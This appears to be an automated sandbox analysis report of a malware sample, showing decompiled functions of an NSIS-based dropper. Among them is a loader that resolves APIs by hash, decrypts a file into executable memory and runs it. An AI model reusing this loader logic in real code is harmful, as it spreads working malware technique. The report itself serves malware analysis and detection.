                              • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E10001120(void* __eflags) {
                              				signed int _v8;
                              				short _v528;
                              				signed int _v529;
                              				signed int _v536;
                              				intOrPtr _v540;
                              				void* _v544;
                              				long _v548;
                              				void* _v552;
                              				long _v556;
                              				intOrPtr _v560;
                              				intOrPtr _v564;
                              				intOrPtr _v568;
                              				intOrPtr _v572;
                              				intOrPtr _v576;
                              				intOrPtr _v580;
                              				signed int _t156;
                              
                              				_v8 =  *0x10003028 ^ _t156;
                              				_v536 = 0;
                              				_v556 = 0;
                              				_v540 = E10001000();
                              				_v568 = E10001070(_v540, 0x8a111d91);
                              				_v560 = E10001070(_v540, 0xcbec1a0);
                              				_v564 = E10001070(_v540, 0xa4f84a9a);
                              				_v572 = E10001070(_v540, 0x170c1ca1);
                              				_v580 = E10001070(_v540, 0x433a3842);
                              				_v576 = E10001070(_v540, 0xa5f15738);
                              				_v560(0x103,  &_v528);
                              				_v564( &_v528, 0x10003000);
                              				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
                              				_v548 = _v572(_v552, 0);
                              				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
                              				ReadFile(_v552, _v544, _v548,  &_v556, 0);
                              				_v536 = 0;
                              				while(_v536 < _v556) {
                              					_v529 =  *((intOrPtr*)(_v544 + _v536));
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 = (_v529 & 0x000000ff) >> 0x00000006 | (_v529 & 0x000000ff) << 0x00000002;
                              					_v529 = _v529 & 0x000000ff ^ _v536;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 =  ~(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) - 0x6a;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) - _v536;
                              					_v529 = (_v529 & 0x000000ff) >> 0x00000007 | (_v529 & 0x000000ff) << 0x00000001;
                              					 *((char*)(_v544 + _v536)) = _v529;
                              					_v536 = _v536 + 1;
                              				}
                              				_v544();
                              				return E10001469(_v8 ^ _t156);
                              			}




















                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                              Memory Dump Source
                              • Source File: 00000004.00000002.2163547953.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000004.00000002.2163531689.0000000010000000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2163592483.0000000010002000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2163618148.0000000010004000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$AllocCreateReadVirtual
                              • String ID:
                              • API String ID: 3585551309-0
                              • Opcode ID: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
                              • Instruction ID: 83d81e531b48bbb665f37a7df122501d88c9d55b6a80c66f86e06f7556a42c30
                              • Opcode Fuzzy Hash: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
                              • Instruction Fuzzy Hash: 03715174C462BC9ADB21CBA49C9CBECBFB09F5A201F0481C9E59C66286C6345FC4CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0040329A(intOrPtr _a4) {
                              				intOrPtr _t10;
                              				intOrPtr _t11;
                              				signed int _t12;
                              				void* _t14;
                              				void* _t15;
                              				long _t16;
                              				void* _t18;
                              				intOrPtr _t19;
                              				intOrPtr _t31;
                              				long _t32;
                              				intOrPtr _t34;
                              				intOrPtr _t36;
                              				void* _t37;
                              				intOrPtr _t49;
                              
                              				_t32 =  *0x41f8fc; // 0x8904f
                              				_t34 = _t32 -  *0x40b868 + _a4;
                              				 *0x424750 = GetTickCount() + 0x1f4;
                              				if(_t34 <= 0) {
                              					L22:
                              					E00402E52(1);
                              					return 0;
                              				}
                              				E00403419( *0x41f90c);
                              				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
                              				 *0x41f908 = _t34;
                              				 *0x41f8f8 = 0;
                              				while(1) {
                              					_t10 =  *0x41f900; // 0x923f7
                              					_t31 = 0x4000;
                              					_t11 = _t10 -  *0x41f90c;
                              					if(_t11 <= 0x4000) {
                              						_t31 = _t11;
                              					}
                              					_t12 = E00403403(0x4138f8, _t31);
                              					if(_t12 == 0) {
                              						break;
                              					}
                              					 *0x41f90c =  *0x41f90c + _t31;
                              					 *0x40b888 = 0x4138f8;
                              					 *0x40b88c = _t31;
                              					L6:
                              					L6:
                              					if( *0x424754 != 0 &&  *0x424800 == 0) {
                              						_t19 =  *0x41f908; // 0x831db
                              						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
                              						E00402E52(0);
                              					}
                              					 *0x40b890 = 0x40b8f8;
                              					 *0x40b894 = 0x8000; // executed
                              					_t14 = E00406776(0x40b870); // executed
                              					if(_t14 < 0) {
                              						goto L20;
                              					}
                              					_t36 =  *0x40b890; // 0x40db5c
                              					_t37 = _t36 - 0x40b8f8;
                              					if(_t37 == 0) {
                              						__eflags =  *0x40b88c; // 0x0
                              						if(__eflags != 0) {
                              							goto L20;
                              						}
                              						__eflags = _t31;
                              						if(_t31 == 0) {
                              							goto L20;
                              						}
                              						L16:
                              						_t16 =  *0x41f8fc; // 0x8904f
                              						if(_t16 -  *0x40b868 + _a4 > 0) {
                              							continue;
                              						}
                              						SetFilePointer( *0x40a01c, _t16, 0, 0);
                              						goto L22;
                              					}
                              					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
                              					if(_t18 == 0) {
                              						_push(0xfffffffe);
                              						L21:
                              						_pop(_t15);
                              						return _t15;
                              					}
                              					 *0x40b868 =  *0x40b868 + _t37;
                              					_t49 =  *0x40b88c; // 0x0
                              					if(_t49 != 0) {
                              						goto L6;
                              					}
                              					goto L16;
                              					L20:
                              					_push(0xfffffffd);
                              					goto L21;
                              				}
                              				return _t12 | 0xffffffff;
                              			}


















                              APIs
                              • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032AE
                                • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                              • SetFilePointer.KERNEL32(0008904F,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FilePointer$CountTick
                              • String ID:
                              • API String ID: 1092082344-0
                              • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                              • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                              • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                              • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                              				long _v8;
                              				long _t21;
                              				long _t22;
                              				void* _t24;
                              				long _t26;
                              				int _t27;
                              				long _t28;
                              				void* _t30;
                              				long _t31;
                              				long _t32;
                              				long _t36;
                              
                              				_t21 = _a4;
                              				if(_t21 >= 0) {
                              					_t32 = _t21 +  *0x4247b8;
                              					 *0x41f8fc = _t32;
                              					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                              				}
                              				_t22 = E0040329A(4);
                              				if(_t22 >= 0) {
                              					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
                              					if(_t24 == 0) {
                              						L18:
                              						_push(0xfffffffd);
                              						goto L19;
                              					} else {
                              						 *0x41f8fc =  *0x41f8fc + 4;
                              						_t36 = E0040329A(_a4);
                              						if(_t36 < 0) {
                              							L21:
                              							_t22 = _t36;
                              						} else {
                              							if(_a12 != 0) {
                              								_t26 = _a4;
                              								if(_t26 >= _a16) {
                              									_t26 = _a16;
                              								}
                              								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                              								if(_t27 != 0) {
                              									_t36 = _v8;
                              									 *0x41f8fc =  *0x41f8fc + _t36;
                              									goto L21;
                              								} else {
                              									goto L18;
                              								}
                              							} else {
                              								if(_a4 <= 0) {
                              									goto L21;
                              								} else {
                              									while(1) {
                              										_t28 = _a4;
                              										if(_a4 >= 0x4000) {
                              											_t28 = 0x4000;
                              										}
                              										_v8 = _t28;
                              										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
                              											goto L18;
                              										}
                              										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
                              										if(_t30 == 0) {
                              											_push(0xfffffffe);
                              											L19:
                              											_pop(_t22);
                              										} else {
                              											_t31 = _v8;
                              											_a4 = _a4 - _t31;
                              											 *0x41f8fc =  *0x41f8fc + _t31;
                              											_t36 = _t36 + _t31;
                              											if(_a4 > 0) {
                              												continue;
                              											} else {
                              												goto L21;
                              											}
                              										}
                              										goto L22;
                              									}
                              									goto L18;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				L22:
                              				return _t22;
                              			}















                              APIs
                              • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                              • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                              • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                              • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E00401389(signed int _a4, struct HWND__* _a11) {
                              				intOrPtr* _t6;
                              				void* _t8;
                              				void* _t10;
                              				signed int _t11;
                              				void* _t12;
                              				signed int _t16;
                              				signed int _t17;
                              
                              				_t17 = _a4;
                              				while(_t17 >= 0) {
                              					_t6 = _t17 * 0x1c +  *0x424790;
                              					if( *_t6 == 1) {
                              						break;
                              					}
                              					_push(_t6); // executed
                              					_t8 = E00401434(); // executed
                              					if(_t8 == 0x7fffffff) {
                              						return 0x7fffffff;
                              					}
                              					_t10 = E0040136D(_t8);
                              					if(_t10 != 0) {
                              						_t11 = _t10 - 1;
                              						_t16 = _t17;
                              						_t17 = _t11;
                              						_t12 = _t11 - _t16;
                              					} else {
                              						_t12 = _t10 + 1;
                              						_t17 = _t17 + 1;
                              					}
                              					if(_a11 != 0) {
                              						 *0x423f2c =  *0x423f2c + _t12;
                              						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
                              					}
                              				}
                              				return 0;
                              			}











                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                              • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                              • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                              • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00406631(signed int _a4) {
                              				struct HINSTANCE__* _t5;
                              				signed int _t10;
                              
                              				_t10 = _a4 << 3;
                              				_t8 =  *(_t10 + 0x40a258);
                              				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                              				if(_t5 != 0) {
                              					L2:
                              					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                              				}
                              				_t5 = E004065C3(_t8); // executed
                              				if(_t5 == 0) {
                              					return 0;
                              				}
                              				goto L2;
                              			}






                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                              • GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                              • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                              • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                              • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E00405DC1(CHAR* _a4, long _a8, long _a12) {
                              				signed int _t5;
                              				void* _t6;
                              
                              				_t5 = GetFileAttributesA(_a4); // executed
                              				asm("sbb ecx, ecx");
                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                              				return _t6;
                              			}






                              APIs
                              • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                              • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                              • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                              • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405D9C(CHAR* _a4) {
                              				signed char _t3;
                              				signed char _t7;
                              
                              				_t3 = GetFileAttributesA(_a4); // executed
                              				_t7 = _t3;
                              				if(_t7 != 0xffffffff) {
                              					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                              				}
                              				return _t7;
                              			}






                              APIs
                              • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                              • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                              • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                              • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405892(CHAR* _a4) {
                              				int _t2;
                              
                              				_t2 = CreateDirectoryA(_a4, 0); // executed
                              				if(_t2 == 0) {
                              					return GetLastError();
                              				}
                              				return 0;
                              			}





                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                              • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                              • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                              • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405E68(void* _a4, void* _a8, long _a12) {
                              				int _t7;
                              				long _t11;
                              
                              				_t11 = _a12;
                              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                              				if(_t7 == 0 || _t11 != _a12) {
                              					return 0;
                              				} else {
                              					return 1;
                              				}
                              			}






                              APIs
                              • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E7C
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                              • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                              • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405E39(void* _a4, void* _a8, long _a12) {
                              				int _t7;
                              				long _t11;
                              
                              				_t11 = _a12;
                              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                              				if(_t7 == 0 || _t11 != _a12) {
                              					return 0;
                              				} else {
                              					return 1;
                              				}
                              			}






                              APIs
                              • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000), ref: 00405E4D
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                              • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                              • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                              • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00403419(long _a4) {
                              				long _t2;
                              
                              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                              				return _t2;
                              			}




                              0x00403427
                              0x0040342d

                              APIs
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              C-Code - Quality: 96%
                              			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                              				struct HWND__* _v8;
                              				struct tagRECT _v24;
                              				void* _v32;
                              				signed int _v36;
                              				int _v40;
                              				int _v44;
                              				signed int _v48;
                              				int _v52;
                              				void* _v56;
                              				void* _v64;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				struct HWND__* _t87;
                              				struct HWND__* _t89;
                              				long _t90;
                              				int _t95;
                              				int _t96;
                              				long _t99;
                              				void* _t102;
                              				intOrPtr _t124;
                              				struct HWND__* _t128;
                              				int _t150;
                              				int _t153;
                              				long _t157;
                              				struct HWND__* _t161;
                              				struct HMENU__* _t163;
                              				long _t165;
                              				void* _t166;
                              				char* _t167;
                              				char* _t168;
                              				int _t169;
                              
                              				_t87 =  *0x423f24; // 0x0
                              				_t157 = _a8;
                              				_t150 = 0;
                              				_v8 = _t87;
                              				if(_t157 != 0x110) {
                              					__eflags = _t157 - 0x405;
                              					if(_t157 == 0x405) {
                              						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                              					}
                              					__eflags = _t157 - 0x111;
                              					if(_t157 != 0x111) {
                              						L17:
                              						__eflags = _t157 - 0x404;
                              						if(_t157 != 0x404) {
                              							L25:
                              							__eflags = _t157 - 0x7b;
                              							if(_t157 != 0x7b) {
                              								goto L20;
                              							}
                              							_t89 = _v8;
                              							__eflags = _a12 - _t89;
                              							if(_a12 != _t89) {
                              								goto L20;
                              							}
                              							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                              							__eflags = _t90 - _t150;
                              							_a12 = _t90;
                              							if(_t90 <= _t150) {
                              								L36:
                              								return 0;
                              							}
                              							_t163 = CreatePopupMenu();
                              							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
                              							_t95 = _a16;
                              							__eflags = _a16 - 0xffffffff;
                              							_t153 = _a16 >> 0x10;
